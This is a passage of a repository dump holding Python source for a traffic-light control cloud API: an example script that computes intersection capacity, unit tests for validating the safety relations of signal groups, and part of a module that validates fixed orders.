any infrastructural changes (or policy changes by the government) are needed.\n\n This is a very difficult decision to be made with high impact; quantitative support is really useful when making\n these decisions. It is now possible, to evaluate the maximum traffic increase that the intersection/infrastructure\n is able to handle under optimal traffic light control. 
This could be used to answer questions like: is the\n capacity of our infrastructure (intersection) expected to still be sufficient in 3 years?\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Maximizing capacity of the intersection\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.max_capacity)\n\n logging.info(f\"Maximum sustainable increase in traffic {(objective_value - 1) * 100:.2f}%\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n scaling_factor = 1.2\n logging.info(f\"Increasing original amount of traffic with {(scaling_factor - 1) * 100:.2f}%\")\n arrival_rates *= scaling_factor\n logging.info(f\"Expected maximum sustainable increase: {(objective_value/scaling_factor - 1) * 100:.2f}%\")\n\n logging.info(f\"Maximizing capacity of the intersection with scaled traffic\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.max_capacity)\n\n # objective_value < 1 implies that the intersection is oversaturated for any traffic light controller.\n logging.info(f\"Computed maximum sustainable increase in traffic: {(objective_value - 1) * 100:.2f}%\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n maximize_intersection_capacity()\n"
},
{
"alpha_fraction": 0.6233813762664795,
"alphanum_fraction": 0.6457049250602722,
"avg_line_length": 51.82273483276367,
"blob_id": "7dbaf44504d8c5d85465e53a42d053ab2fdd1380",
"content_id": "dc6306c20460e3029ae0bed6eb849f999bb0c9e6",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27415,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 519,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_other_sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom copy import deepcopy\nfrom typing import List, Optional\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.sg_relations import SyncStart, Offset, GreenyellowLead, Conflict, \\\n GreenyellowTrail\nfrom swift_cloud_py.validate_safety_restrictions.validate_other_sg_relations import find_other_sg_relation_matches, \\\n get_shift_of_one_to_one_match, get_other_sg_relation_shift, validate_other_sg_relations\n\n\nclass TestFindOtherRelationMatches(unittest.TestCase):\n \"\"\" Unittests of the function find_other_sg_relation_matches \"\"\"\n\n def test_zero_shift(self) -> None:\n \"\"\" Test finding a shift of zero \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n\n # WHEN\n matches = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=0)\n matches2 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=1)\n\n # THEN\n self.assertListEqual(matches, [1, 0])\n self.assertListEqual(matches2, [0, 1])\n\n def test_shift_one(self) -> None:\n \"\"\" Test finding a shift of one \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=50, end_greenyellow=60),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)]),\n period=100)\n\n # WHEN\n matches = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=0)\n matches2 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=1)\n\n # THEN\n self.assertListEqual(matches, [0, 1])\n self.assertListEqual(matches2, [1, 0])\n\n def test_no_shift_possible(self) -> None:\n \"\"\" Test finding the shifts for a schedule without an unambiguous shift\"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)]),\n period=100)\n\n # swap two intervals (we do this after initialization as otherwise we would get a ValueError (not correct order\n # of greenyellow intervals) when initializing the FixedTimeSchedule\n fts._greenyellow_intervals[\"sg2\"][:2] = reversed(fts._greenyellow_intervals[\"sg2\"][:2])\n\n # WHEN\n matches = find_other_sg_relation_matches(other_relation=sync_start, 
fts=fts, index_from=0)\n matches2 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=1)\n matches3 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=2)\n\n # THEN\n self.assertListEqual(matches, [0, 1, 0])\n self.assertListEqual(matches2, [1, 0, 0])\n self.assertListEqual(matches3, [0, 0, 1])\n\n\nclass TestGetOneToOneMatch(unittest.TestCase):\n \"\"\" Unittests of the function get_shift_of_one_to_one_match \"\"\"\n\n def test_zero_shift(self) -> None:\n \"\"\" Test finding a shift of zero \"\"\"\n # GIVEN (matches has a diagonal of True values indicating a shift of zero)\n matches = [[True, False, True], [False, True, False], [True, False, True]]\n\n # WHEN\n shift = get_shift_of_one_to_one_match(matches=matches)\n\n # THEN\n self.assertEqual(shift, 0)\n\n def test_shift_of_one(self) -> None:\n \"\"\" Test finding a shift of one \"\"\"\n # GIVEN\n matches = [[False, True, True], [False, True, True], [True, False, False]]\n\n # WHEN\n shift = get_shift_of_one_to_one_match(matches=matches)\n\n # THEN\n self.assertEqual(shift, 1)\n\n def test_no_shift_possible(self) -> None:\n \"\"\" Test finding no shift is possible if matches shows no unambiguous shift\"\"\"\n # GIVEN\n matches = [[False, False, True], [False, True, True], [True, False, False]]\n\n # WHEN\n shift = get_shift_of_one_to_one_match(matches=matches)\n\n # THEN\n self.assertEqual(shift, None)\n\n\nclass TestGetOtherRelationShift(unittest.TestCase):\n \"\"\" Unittests of the function get_other_sg_relation_shift \"\"\"\n\n def test_zero_shift(self) -> None:\n \"\"\" Test finding a shift of zero \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=80)]),\n period=100)\n\n # WHEN\n shift = get_other_sg_relation_shift(other_relation=sync_start, fts=fts)\n\n # THEN\n self.assertEqual(shift, 0)\n\n def test_shift_of_one(self) -> None:\n \"\"\" Test finding a shift of one \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=50, end_greenyellow=80),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)]),\n period=100)\n\n # WHEN\n shift = get_other_sg_relation_shift(other_relation=sync_start, fts=fts)\n\n # THEN\n self.assertEqual(shift, 1)\n\n def test_no_shift_possible(self) -> None:\n \"\"\" Test finding no shift is possible for a schedule without an unambiguous shift\"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)]),\n period=100)\n\n # Swap two intervals (we do this after initialization as otherwise we would 
get a ValueError (not correct order\n        # of greenyellow intervals))\n        fts._greenyellow_intervals[\"sg2\"][:2] = reversed(fts._greenyellow_intervals[\"sg2\"][:2])\n\n        # WHEN\n        shift = get_other_sg_relation_shift(other_relation=sync_start, fts=fts)\n\n        # THEN\n        self.assertEqual(shift, None)\n\n\nclass TestFTSOtherSGRelationValidation(unittest.TestCase):\n    \"\"\" Test validation of other sg relations (synchronous starts, offsets, greenyellow-leads,...)\"\"\"\n\n    @staticmethod\n    def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n                                min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n        \"\"\" Get a default signalgroup object\"\"\"\n        traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n        return SignalGroup(id=name, traffic_lights=[traffic_light],\n                           min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n                           max_red=max_red, min_nr=1, max_nr=3)\n\n    @staticmethod\n    def get_default_intersection(additional_signalgroups: Optional[List[SignalGroup]] = None,\n                                 sync_starts: List[SyncStart] = None,\n                                 offsets: List[Offset] = None,\n                                 greenyellow_leads: List[GreenyellowLead] = None,\n                                 greenyellow_trails: List[GreenyellowTrail] = None,\n                                 ) -> Intersection:\n        \"\"\"\n        Get a default intersection object with 2 conflicting signal groups \"sg1\" and \"sg2\"\n        :param additional_signalgroups: signal groups to add to the intersection (besides signal group 'sg1' and 'sg2')\n        :param sync_starts: SyncStarts that must be satisfied\n        :param offsets: Offsets that must be satisfied\n        :param greenyellow_leads: GreenyellowLeads that must be satisfied\n        :param greenyellow_trails: GreenyellowTrails that must be satisfied\n        :return: the intersection object\n        \"\"\"\n        if additional_signalgroups is None:\n            additional_signalgroups = []\n\n        if sync_starts is None:\n            sync_starts = []\n        if offsets is None:\n            offsets = []\n        if greenyellow_leads is None:\n            greenyellow_leads = []\n        if greenyellow_trails is None:\n            greenyellow_trails = []\n\n        signalgroup1 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg1\")\n        signalgroup2 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg2\")\n\n        conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n        intersection = Intersection(signalgroups=[signalgroup1, signalgroup2] + additional_signalgroups,\n                                    conflicts=[conflict], sync_starts=sync_starts, offsets=offsets,\n                                    greenyellow_leads=greenyellow_leads, greenyellow_trails=greenyellow_trails)\n\n        return intersection\n\n    def test_correct_sync_starts(self) -> None:\n        \"\"\"\n        Test that validation of correct synchronous start passes.\n        :return:\n        \"\"\"\n        # GIVEN\n        sync_start = SyncStart(from_id=\"sg3\", to_id=\"sg4\")\n        fts = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n            period=100)\n        signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], 
sync_starts=[sync_start])\n\n        # WHEN validating\n        validate_other_sg_relations(intersection=intersection, fts=fts)\n\n        # THEN no error should be raised\n\n    def test_incorrect_sync_starts(self) -> None:\n        \"\"\"\n        Test that validation of incorrect synchronous start raises SafetyViolation.\n        :return:\n        \"\"\"\n        # GIVEN\n        sync_start = SyncStart(from_id=\"sg3\", to_id=\"sg4\")\n        fts = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=9, end_greenyellow=30),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n            period=100)\n        signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], sync_starts=[sync_start])\n\n        with self.assertRaises(SafetyViolation):\n            # WHEN validating\n            validate_other_sg_relations(intersection=intersection, fts=fts)\n\n        # THEN an error should be raised\n\n    def test_correct_offset(self) -> None:\n        \"\"\"\n        Test that validation of correct offset passes.\n        :return:\n        \"\"\"\n        # GIVEN\n        offset = Offset(from_id=\"sg3\", to_id=\"sg4\", seconds=20)\n        fts = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=70, end_greenyellow=90)]),\n            period=100)\n        signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], offsets=[offset])\n\n        for interval_shift in range(2):\n            with self.subTest(f\"interval_shift={interval_shift}\"):\n                fts_copy = deepcopy(fts)\n                # rotate the greenyellow intervals of sg4 by interval_shift positions\n                fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:] + \\\n                                                         fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift]\n                # WHEN validating\n                validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n                # THEN no error should be raised\n\n    def test_incorrect_offset(self) -> None:\n        \"\"\"\n        Test that validation of incorrect offset raises SafetyViolation.\n        :return:\n        \"\"\"\n        # GIVEN\n        offset = Offset(from_id=\"sg3\", to_id=\"sg4\", seconds=20)\n        fts_org = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n            period=100)\n        signalgroup3 = 
TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], offsets=[offset])\n\n        for interval_shift in range(2):\n            with self.subTest(f\"interval_shift={interval_shift}\"):\n                fts = deepcopy(fts_org)\n                # rotate the greenyellow intervals of sg4 by interval_shift positions\n                fts._greenyellow_intervals[\"sg4\"] = fts._greenyellow_intervals[\"sg4\"][interval_shift:] + \\\n                                                    fts._greenyellow_intervals[\"sg4\"][:interval_shift]\n\n                with self.assertRaises(SafetyViolation):\n                    # WHEN validating\n                    validate_other_sg_relations(intersection=intersection, fts=fts)\n\n                # THEN a SafetyViolation error should be raised\n\n    def test_correct_greenyellow_lead(self) -> None:\n        \"\"\"\n        Test that validation of correct greenyellow-lead passes.\n        :return:\n        \"\"\"\n        # GIVEN\n        min_greenyellow_lead = 20\n        max_greenyellow_lead = 30\n        greenyellow_lead = GreenyellowLead(from_id=\"sg3\", to_id=\"sg4\",\n                                           min_seconds=min_greenyellow_lead, max_seconds=max_greenyellow_lead)\n        fts = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n            period=100)\n        signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_leads=[greenyellow_lead])\n\n        for pre_start_time in [min_greenyellow_lead, max_greenyellow_lead]:\n            for interval_shift in range(2):\n                fts_copy = deepcopy(fts)\n\n                # adjust schedule to the specified greenyellow_lead\n                for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n                    greenyellow_start = (greenyellow_interval.start_greenyellow - pre_start_time) % fts_copy.period\n                    greenyellow_end = (greenyellow_start + 20) % fts_copy.period\n                    fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n                        start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n                # rotate the greenyellow intervals of sg4 by interval_shift positions\n                fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:] + \\\n                                                         fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift]\n\n                with self.subTest(f\"greenyellow_lead={pre_start_time}, interval_shift={interval_shift}\"):\n                    # WHEN validating\n                    validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n                    # THEN no error should be raised\n\n    def test_incorrect_greenyellow_lead(self) -> None:\n        \"\"\"\n        Test that validation of incorrect greenyellow-lead raises SafetyViolation.\n        :return:\n        \"\"\"\n        # GIVEN\n        min_greenyellow_lead = 20\n        max_greenyellow_lead = 30\n        greenyellow_lead = GreenyellowLead(from_id=\"sg3\", to_id=\"sg4\",\n                                           min_seconds=min_greenyellow_lead, max_seconds=max_greenyellow_lead)\n        fts = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, 
end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n            period=100)\n        signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_leads=[greenyellow_lead])\n\n        for lead_time in [min_greenyellow_lead - 1, max_greenyellow_lead + 1]:\n            for interval_shift in range(2):\n                fts_copy = deepcopy(fts)\n\n                # adjust schedule to the specified greenyellow-lead\n                for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n                    greenyellow_start = (greenyellow_interval.start_greenyellow - lead_time) % fts_copy.period\n                    greenyellow_end = (greenyellow_start + 20) % fts_copy.period\n                    fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n                        start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n                # rotate the greenyellow intervals of sg4 by interval_shift positions\n                fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:] + \\\n                                                         fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift]\n\n                with self.subTest(f\"greenyellow_lead={lead_time}, interval_shift={interval_shift}\"):\n                    with self.assertRaises(SafetyViolation):\n                        # WHEN validating\n                        validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n                    # THEN a SafetyViolation should be raised\n\n    def test_correct_greenyellow_trail(self) -> None:\n        \"\"\"\n        Test that validation of correct greenyellow-trail passes.\n        :return:\n        \"\"\"\n        # GIVEN\n        min_greenyellow_trail = 20\n        max_greenyellow_trail = 30\n        greenyellow_trail = GreenyellowTrail(from_id=\"sg3\", to_id=\"sg4\",\n                                             min_seconds=min_greenyellow_trail, max_seconds=max_greenyellow_trail)\n        fts = FixedTimeSchedule(greenyellow_intervals=dict(\n            sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n            sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n            sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n            sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n                 GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n            period=100)\n        signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n        signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n        intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n            additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_trails=[greenyellow_trail])\n\n        for trail_time in [min_greenyellow_trail, max_greenyellow_trail]:\n            for interval_shift in range(2):\n                fts_copy = deepcopy(fts)\n\n                # adjust schedule to the specified greenyellow-trail\n                for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n                    greenyellow_end = (greenyellow_interval.end_greenyellow - trail_time) % fts_copy.period\n                    greenyellow_start = (greenyellow_end - 20) % fts_copy.period\n                    fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n                        start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n                # rotate the greenyellow intervals of sg4 by interval_shift positions\n                fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:] + \\\n                                                         fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift]\n\n                
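# note (added): at this point fts_copy encodes a greenyellow-trail of exactly\n                # trail_time seconds from sg3 to sg4, a value within [min, max], so the\n                # validation below is expected to pass\n                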
with self.subTest(f\"greenyellow_lead={trail_time}, interval_shift={interval_shift}\"):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN no error should be raised\n\n def test_incorrect_greenyellow_trail(self) -> None:\n \"\"\"\n Test that validation of incorrect greenyellow-trail raises SafetyViolation.\n :return:\n \"\"\"\n # GIVEN\n min_greenyellow_trail = 20\n max_greenyellow_trail = 30\n greenyellow_lead = GreenyellowLead(from_id=\"sg3\", to_id=\"sg4\",\n min_seconds=min_greenyellow_trail, max_seconds=max_greenyellow_trail)\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_leads=[greenyellow_lead])\n\n for trail_time in [min_greenyellow_trail - 1, max_greenyellow_trail + 1]:\n for interval_shift in range(2):\n fts_copy = deepcopy(fts)\n\n # adjust schedule to the specified greenyellow-lead\n for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n greenyellow_end = (greenyellow_interval.end_greenyellow - trail_time) % fts_copy.period\n greenyellow_start = (greenyellow_end - 20) % fts_copy.period\n fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:]\n\n with self.subTest(f\"greenyellow_lead={trail_time}, interval_shift={interval_shift}\"):\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN a SafetyViolation should be raised\n"
},
{
"alpha_fraction": 0.7518059611320496,
"alphanum_fraction": 0.7554179430007935,
"avg_line_length": 59.5625,
"blob_id": "d4d5b99714ebc31d4763a52b515f6e2003a1b05e",
"content_id": "d5c0292b508452ebc09211c0e927968dd3bbe0e0",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1938,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 32,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_fixed_orders.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\n\nEPSILON = 10**(-6) # small value used in checks to correct for numeric inaccuracies\n\n\ndef validate_fixed_orders(intersection: Intersection, fts: FixedTimeSchedule) -> None:\n \"\"\" Validate that the the signalgroups indeed receive their greenyellow intervals\n in the requested periodic orders\n :return: -\n :raises SafetyException: if the requested order is not satisfied\"\"\"\n for periodic_order in intersection.periodic_orders:\n validate_fixed_order(intersection=intersection, fts=fts, periodic_order=periodic_order)\n\n\ndef validate_fixed_order(intersection: Intersection, fts: FixedTimeSchedule, periodic_order: PeriodicOrder) -> None:\n \"\"\" Validate that the the signalgroups indeed receive their greenyellow intervals\n in the requested periodic order (for only the periodic order that is given as argument).\n :return: -\n :raises SafetyException: if the requested order is not satisfied\"\"\"\n first_signalgroup = intersection.get_signalgroup(signalgroup_id=periodic_order.order[0])\n first_interval_start = fts.get_greenyellow_interval(first_signalgroup, k=0).start_greenyellow\n prev_switch = 0\n for signalgroup in periodic_order.order:\n for interval in fts.get_greenyellow_intervals(signalgroup):\n # shift schedule such that first greenyellow interval of the first signalgroup in the order starts at time=0\n switch = (interval.start_greenyellow - first_interval_start + EPSILON) % fts.period - EPSILON\n if switch < prev_switch:\n raise 